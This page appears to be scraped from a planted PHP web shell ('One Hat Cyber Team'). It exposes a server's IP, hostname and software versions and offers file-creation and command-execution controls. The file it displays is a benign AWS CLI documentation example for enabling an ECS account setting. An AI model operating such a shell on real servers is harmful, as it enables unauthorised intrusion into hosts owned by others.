⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
ecs
/
View File Name :
put-account-setting.rst
**To modify the account setting for your IAM user account** The following ``put-account-setting`` example enables the ``serviceLongArnFormat`` account setting for your IAM user account. :: aws ecs put-account-setting --name serviceLongArnFormat --value enabled Output:: { "setting": { "name": "serviceLongArnFormat", "value": "enabled", "principalArn": "arn:aws:iam::130757420319:user/your_username" } } For more information, see `Modifying Account Settings
`__ in the *Amazon ECS Developer Guide*.